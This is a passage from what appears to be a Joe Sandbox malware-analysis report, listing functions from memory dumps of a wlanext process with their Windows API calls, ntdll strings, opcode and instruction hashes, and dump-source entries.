                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$AddressEnterErrorLastProc$LeaveLibrarymemset$FreeLoadMessageTrace
                                            • String ID: Dot11ExtIhvGetVersionInfo$Dot11ExtIhvInitService$Dot11ExtIhvInitVirtualStation
                                            • API String ID: 263776258-37986322
                                            • Opcode ID: e797a39c08767fb5ff5e0619574705bc81c2764e89454c6b00c0df3543d1acad
                                            • Instruction ID: b09ccb79cafdf517efeebb0d065dff9112acbede3479ded93c6156e5aaab64db
                                            • Opcode Fuzzy Hash: e797a39c08767fb5ff5e0619574705bc81c2764e89454c6b00c0df3543d1acad
                                            • Instruction Fuzzy Hash: 2EC1053190029CABD7669F66CC09F6A7BA5FF047A4F140055EA01E72A6CB75CD80FB91
                                            Function 03632890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 28f260b792f27072ac2387d1b6819926ad21db16925025a2b899835c618ad2e2
                                            • Instruction ID: 92aa3bade742b50e88b4d4d6cfabddc904c010308c1e200f61df688fe537eaf1
                                            • Opcode Fuzzy Hash: 28f260b792f27072ac2387d1b6819926ad21db16925025a2b899835c618ad2e2
                                            • Instruction Fuzzy Hash: F75108B6A00256BFCB10DF99C9A097EF7B8FB092407148669E4A5D7741E334DE45CBE0
                                            Function 036A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 0042defa165c1ab947cbc31d722802015beb4a00c47b0dc49921e40b6c17ea70
                                            • Instruction ID: f7130c58a69ee77153191a0e471163b0ce3b640d1abdff98f089ca9e3df20507
                                            • Opcode Fuzzy Hash: 0042defa165c1ab947cbc31d722802015beb4a00c47b0dc49921e40b6c17ea70
                                            • Instruction Fuzzy Hash: 115116B5A44A55AECB34DF9CC9A097FFBFDEB44200B088869E495C7641E774EE408F60
                                            Function 03627630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            • Execute=1, xrefs: 03664713
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03664725
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03664787
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036646FC
                                            • ExecuteOptions, xrefs: 036646A0
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03664742
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03664655
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 84cb25ff51391345b62a9692dfae33d576f03e53b3bb754389c6ce833e1534df
                                            • Instruction ID: 988a5944d9dea42e84d4829c4cb080fc9d68375597bbf642fa91e2a85e53fa17
                                            • Opcode Fuzzy Hash: 84cb25ff51391345b62a9692dfae33d576f03e53b3bb754389c6ce833e1534df
                                            • Instruction Fuzzy Hash: C3514935600B296ADF21EBA8EC89FAE7BA8EF05300F05009DD505AB292DB719A458F54
                                            Function 00FEB358 Relevance: 13.7, APIs: 9, Instructions: 178COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTokenInformation.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00FF1000,?,00FE1AF4,?,?,?,?,00FEB60C), ref: 00FEB3B2
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00FEB60C), ref: 00FEB3B8
                                            • GetTokenInformation.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000001(TokenIntegrityLevel),?,00000000,00000000,00000000,?,?,?,?,?,00FEB60C), ref: 00FEB42C
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00FEB60C), ref: 00FEB436
                                            • IsValidSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,?,?,?,?,00FEB60C), ref: 00FEB465
                                            • GetLengthSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,?,?,?,?,00FEB60C), ref: 00FEB4A8
                                            • CopySid.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,00FEB60C,?,00000000,00FEB60C,?,?,?,?,00FEB60C), ref: 00FEB4CA
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00FEB60C), ref: 00FEB4D4
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                              • Part of subcall function 00FEAD7C: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,00FE1AF4,00000021,00FEB52D,0000000A,00000000,?,00000000,?,00FEB52D,?,?,?), ref: 00FEADC7
                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?,?,?,?,?,00FEB60C), ref: 00FEB53D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ErrorLast$InformationMessageTokenTrace$CopyFreeLengthLocalValid
                                            • String ID:
                                            • API String ID: 3833298366-0
                                            • Opcode ID: 1701a39ba886af77bfeddc9ec6d8e66e532f920285b5c03124ce56e482c31625
                                            • Instruction ID: d0397aabfd09d1591794a85f9b1c46fd3bee6523a21b819db6c2c16bbc9d6ea6
                                            • Opcode Fuzzy Hash: 1701a39ba886af77bfeddc9ec6d8e66e532f920285b5c03124ce56e482c31625
                                            • Instruction Fuzzy Hash: 32618271901288AFDB258F56DC48FBA7BAABF04365F190095F900A72BAC771CD80FB54
                                            Function 00FEA3BC Relevance: 13.7, APIs: 9, Instructions: 166timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500,00000005,00000000,00000001,?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA3F8
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500,?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA431
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500,?,?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA482
                                            • ChangeTimerQueueTimer.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(?,?,7FFFFFFF,00000000,?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA493
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA49D
                                            • DeleteTimerQueueTimer.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(?,?,000000FF,?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA510
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA51A
                                            • DeleteTimerQueueEx.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(?,000000FF,?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA555
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA55F
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Timer$CriticalErrorLastQueueSection$DeleteLeave$ChangeEnterMessageTrace
                                            • String ID:
                                            • API String ID: 2363892891-0
                                            • Opcode ID: 834840d6b2c563ddb9f7aed188333250eacfb4d9eab8ed632d157ab30652e4a6
                                            • Instruction ID: 2c44fe2f14a6a78898f13e138d5952f555af04f93299ff809c1d88944142ef9a
                                            • Opcode Fuzzy Hash: 834840d6b2c563ddb9f7aed188333250eacfb4d9eab8ed632d157ab30652e4a6
                                            • Instruction Fuzzy Hash: 4A51AE715003C8ABC72A8F269C48F653F5AFF45364F190459E9119B2FACB75E880FB16
                                            Function 00FEA17A Relevance: 12.2, APIs: 8, Instructions: 173timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500,?,00000000,00000001,00FE3676), ref: 00FEA1E7
                                            • CreateTimerQueue.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0 ref: 00FEA21E
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEA22D
                                            • CreateTimerQueueTimer.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(00FF1430,00000000,00FE9FB0,7FFFFFFF,00000064,00000010), ref: 00FEA290
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEA29A
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            • DeleteTimerQueueEx.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(?,000000FF), ref: 00FEA334
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEA33E
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500), ref: 00FEA388
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Timer$ErrorLastQueue$CreateCriticalSection$DeleteEnterLeaveMessageTrace
                                            • String ID:
                                            • API String ID: 1365609285-0
                                            • Opcode ID: 8bda90c673b2feac384784ef012d73bd0b6521391cdcc3763395e0d8cc9f421a
                                            • Instruction ID: ddd00e8e5d746d8a5f6d352a99d0cade1e13717e932d01f9ad72e8f90c9a1e22
                                            • Opcode Fuzzy Hash: 8bda90c673b2feac384784ef012d73bd0b6521391cdcc3763395e0d8cc9f421a
                                            • Instruction Fuzzy Hash: F751D231A012C4DFC725CF279C44B313B9ABF857A5B280158E901AB2BAD737D851FB52
                                            Function 00FE6317 Relevance: 12.2, APIs: 8, Instructions: 150synchronizationthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,0000000A,00000000,00000001), ref: 00FE6359
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560), ref: 00FE63C6
                                            • CreateThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,00000000,00FE6280,?,00000000,00000000), ref: 00FE63E3
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00001388,00001388), ref: 00FE63EF
                                            • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00001388), ref: 00FE643D
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE644E
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560), ref: 00FE64C7
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00FE64D2
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$ErrorLastLeave$CloseCreateEnterHandleMessageObjectSingleThreadTraceWait
                                            • String ID:
                                            • API String ID: 4034362199-0
                                            • Opcode ID: 014e150c6b931722fbbc0747ebd2845139690791bc3042e5d771995daccb48d8
                                            • Instruction ID: a5b813c9992fdfb8aaddf5e65aebc1f155ea53b0718d63c8c24ad2fbf4e9beb9
                                            • Opcode Fuzzy Hash: 014e150c6b931722fbbc0747ebd2845139690791bc3042e5d771995daccb48d8
                                            • Instruction Fuzzy Hash: DA51AE719402CCABD72ACF56DC48B793A69AF543A5F180099E901DB2EACB76CC80F754
                                            Function 00FE7CA0 Relevance: 10.9, APIs: 6, Strings: 1, Instructions: 405COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE7DBA
                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,00000000,00000000), ref: 00FE7E85
                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,00000000,00000000), ref: 00FE7EA9
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE7F2F
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE7F9A
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE800E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FreeLocal
                                            • String ID: OnexIndicateResult
                                            • API String ID: 1627422176-2911527112
                                            • Opcode ID: 605696440932cd7b6638685dda97f3fe01f4742b0a24ccb028312a7941b79019
                                            • Instruction ID: 4a16f27ed9b88928ea6ce07330d2d11562e23f6e83102935771e25d837d11f8e
                                            • Opcode Fuzzy Hash: 605696440932cd7b6638685dda97f3fe01f4742b0a24ccb028312a7941b79019
                                            • Instruction Fuzzy Hash: ADE18B71A083819FD729EF26C844B6BBBE9BF84760F04492DF58587265DB70DC40EB52
                                            Function 00FE3A1A Relevance: 10.8, APIs: 7, Instructions: 344sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(00001388,?,?,?,00FE3991,00001388,00001388), ref: 00FE3C3D
                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(00001388,?,?,?,00FE3991,00001388,00001388), ref: 00FE3CC6
                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(00001388,?,?,?,00FE3991,00001388,00001388), ref: 00FE3D54
                                              • Part of subcall function 00FE6121: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,0000000B,00000000,00000001,00FE3DD8,?,?,?,00FE3991,00001388,00001388), ref: 00FE615C
                                              • Part of subcall function 00FE6121: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,?,?,?,00FE3991,00001388,00001388), ref: 00FE624C
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00FE3991,00001388,00001388), ref: 00FE3E16
                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(000002C9,?,?,?,00FE3991,00001388,00001388), ref: 00FE3E62
                                            • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,00FE3991,00001388,00001388), ref: 00FE3E69
                                            • ExitProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00FE3E70
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                              • Part of subcall function 00FE409B: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1580,00000007,00000000,00000001,00FE3C04,?,?,?,00FE3991,00001388,00001388), ref: 00FE40D5
                                              • Part of subcall function 00FE409B: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1580,?,?,?,00FE3991,00001388,00001388), ref: 00FE4129
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$ProcessSleep$EnterLeave$CloseCurrentExitHandleMessageTerminateTrace
                                            • String ID:
                                            • API String ID: 2912847174-0
                                            • Opcode ID: c76b3f34689bc032cca23b4cbdf1c7d0516843725ad0c380a3876a2caf500b8b
                                            • Instruction ID: cfa4961589c2b704ae5ff9dfebb50bd72b32206411cdd5f0867fa8537c2585e7
                                            • Opcode Fuzzy Hash: c76b3f34689bc032cca23b4cbdf1c7d0516843725ad0c380a3876a2caf500b8b
                                            • Instruction Fuzzy Hash: 81C1C6329413C5AADB2A9B13981CB353E56AF40754B28049CF6051F2FFCA27CA97F785
                                            Function 00FE9FB0 Relevance: 10.6, APIs: 7, Instructions: 127timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500), ref: 00FE9FC1
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500), ref: 00FEA009
                                            • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00FEA028
                                            • QueueUserWorkItem.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(Function_00009EF0,?,00000010), ref: 00FEA06C
                                            • ChangeTimerQueueTimer.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(7FFFFFFF,00000064), ref: 00FEA0AF
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEA0BD
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEA10A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalErrorLastQueueSectionTimer$ChangeCountEnterItemLeaveTickUserWork
                                            • String ID:
                                            • API String ID: 1310459940-0
                                            • Opcode ID: d610e5db7b187ba9f3f0843891e924a898fb2afc6250900e7f8a4b6d87920ffe
                                            • Instruction ID: 4f29aa5e6932e4def7b87a6828e8d29d80dff3448260bf860e56b9693c470602
                                            • Opcode Fuzzy Hash: d610e5db7b187ba9f3f0843891e924a898fb2afc6250900e7f8a4b6d87920ffe
                                            • Instruction Fuzzy Hash: 2741A3316002C4DBDB15CF16DC84B353B5AFF40365F284458EA018A2AACB77EC90FB6A
                                            Function 00FEFA63 Relevance: 10.6, APIs: 7, Instructions: 105sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00FF0578,0000000C), ref: 00FEFAA0
                                            • _amsg_exit.MSVCRT ref: 00FEFAB5
                                            • _initterm.MSVCRT ref: 00FEFB09
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00FEFB35
                                            • exit.MSVCRT ref: 00FEFB7C
                                            • _XcptFilter.MSVCRT ref: 00FEFB8E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                            • String ID:
                                            • API String ID: 796493780-0
                                            • Opcode ID: 0e5c9a844b498e3ae4be9a74292e0af4045abd624c4691b6bdc727df27fe2123
                                            • Instruction ID: 4dbbe26743655407640a71e0009c8ab2de75a39bb0261856079f99e750d1fa5f
                                            • Opcode Fuzzy Hash: 0e5c9a844b498e3ae4be9a74292e0af4045abd624c4691b6bdc727df27fe2123
                                            • Instruction Fuzzy Hash: 7831B276A002DADFD721DF67EC45A393768BF85B30F20003AE6059B2A0DB784848FB51
                                            Function 036C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction ID: 70bfdf83a9c1626986a8e06c39ed38bf645d31af26763c3458bbcebf5eb8280b
                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction Fuzzy Hash: C4022475618381AFD304CF28C594A6BBBF5EFC8710F48892DF9898B264DB31E905CB56
                                            Function 00FE34C8 Relevance: 9.3, APIs: 6, Instructions: 340memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000,00FF1000,?,00FE14C8,00FE3F98,?,00000001,?,00000000,00000000,00FF15A8), ref: 00FE3502
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000001,?,00000000,00000000,00FF15A8), ref: 00FE350C
                                            • _wtol.MSVCRT(?,?,00000001,?,00000000,00000000,00FF15A8), ref: 00FE3591
                                            • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000,00000001,?,00000000,00000000,00FF15A8), ref: 00FE35A8
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE35B7
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                              • Part of subcall function 00FE8DB4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1520,?,00000000,00000001,00FF13CC,?,00FE35F4), ref: 00FE8E1B
                                              • Part of subcall function 00FE8DB4: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1520,?,00000000,00000001,00FF13CC,?,00FE35F4), ref: 00FE8E8D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
